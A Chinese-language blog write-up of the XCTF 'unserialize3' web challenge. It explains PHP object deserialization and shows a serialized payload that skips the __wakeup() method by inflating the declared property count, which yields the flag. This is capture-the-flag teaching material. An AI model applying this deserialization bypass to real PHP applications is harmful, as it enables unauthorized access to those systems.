攻防世界--Web进阶--unserialize3

 xctf类不完整,少了一个大括号。

并且给了?code 提示我们用url进行对code进行赋值

我们可以利用code进行执行url输入。

题目是Unserialize提醒我们是反序列化。所以我们尝试输入序列化后的代码付给code看看会发生,什么。

用下面的网址进行运行php

demo_func_string_serialize 在线代码实例_w3cschool

<?php
class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
}
$a=new xctf();
echo serialize($a)
?>

O:4:"xctf":1:{s:4:"flag";s:3:"111";}

 

 将序列化后的代码赋值给code(注意一定要对xctf类进行序列化,对我们自己定义的类进行序列胡化,后台在进行反序列化的时候会找不到类而无法识别)

因此我们得知code=是可以进行反序列化。

 在xctf类中,定义了魔法方法__wakeup(),在反序列化时调用会先调用__wakeup(),然后就运行了exit并输入bad request 。

因此要拿到flag。我们必须既要反序列化xctf类并且绕过wakeup方法。

__wakeup()函数漏洞原理:当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行。因此,需要修改序列化字符串中的属性个数:

O:4:"xctf":3:{s:4:"flag";s:3:"111";}

 拿到flag

关于反序列化和反序列化漏洞参考

XCTF攻防世界web进阶练习_ 3_unserialize3_silence1_的博客-CSDN博客

 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值